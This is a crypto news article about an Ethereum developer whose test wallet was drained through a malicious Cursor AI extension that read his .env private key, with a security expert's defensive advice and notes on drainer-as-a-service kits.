Ethereum Core Developer’s Wallet Drained by Malicious AI Extension, Exposing New Attack Vector

Veteran Ethereum Developer Falls Victim to Wallet Drainer

A seasoned Ethereum core developer has become the latest target of a sophisticated wallet drainer attack—proving that even the most experienced blockchain builders are not immune to evolving cyber threats.

On Tuesday, developer Zak Cole revealed on X that his funds were stolen after he unknowingly installed a malicious Cursor AI extension named contractshark.solidity-lang. The extension, which appeared professional and had over 54,000 downloads, covertly accessed his private key and transmitted it to an attacker’s server.

Source: Zak.eth

How the Attack Unfolded

Cole explained that the plugin read his .env file, which stored sensitive information, including his Ethereum wallet private key. The attacker maintained access to his hot wallet for three days before draining the funds on August 10.

Fortunately, the loss was limited to a “few hundred” dollars’ worth of Ether (ETH)—valued around $4,698 per coin—because Cole uses small, project-specific hot wallets for testing. His primary holdings remain secure on hardware wallets.

“In over a decade, I’ve never lost a single wei to hackers. Then I rushed to ship a contract last week,” Cole said, calling the incident a hard reminder about security hygiene.

Some of the fake reviews on the spoofed WalletConnect app mentioned features that had nothing to do with crypto. Source: Check Point Research

Source: 21Shares Adds Staking Rewards to Ethereum Core ETP, Rebrands as Ethereum Core Staking ETP

Extensions: The Rising Attack Vector in Crypto Development

The case underscores a growing concern in the blockchain industry: malicious Visual Studio Code (VS Code) and Cursor AI extensions as attack vectors for stealing private keys.

Hakan Unal, senior security operations lead at Cyvers, warned that attackers are increasingly using fake publishers and typosquatting to distribute harmful plugins. His security advice for developers includes:

• Thoroughly vetting extensions before installation

• Avoiding storage of private keys in plain text or .env files

• Using hardware wallets for asset storage

• Developing in isolated environments

The Wallet Drainer-as-a-Service Trend

The attack on Cole is part of a broader surge in wallet drainer malware. These tools are specifically designed to exfiltrate and liquidate cryptocurrency holdings.

In September 2024, a fake WalletConnect Protocol app on the Google Play store stole more than $70,000 in assets after being available for over five months.

The threat is growing more accessible, too. An April 22 report by AMLBot revealed that wallet drainer kits are being sold under a software-as-a-service (SaaS) model, allowing scammers to rent them for as little as $100 USDT.

Crypto drainers report image. Source: AMLBot

Source: https://x.com/SALISU_AUWAL99/status/1941844961860735347

Conclusion

Cole’s experience highlights an urgent reality for crypto builders: the tools they trust to accelerate development may also become the gateway for attackers. With extensions emerging as a major security risk, vigilance, secure development practices, and hardware wallet use are more important than ever.

Related: SharpLink Expands Ethereum Holdings to $1.65B With $108M ETH Buying Spree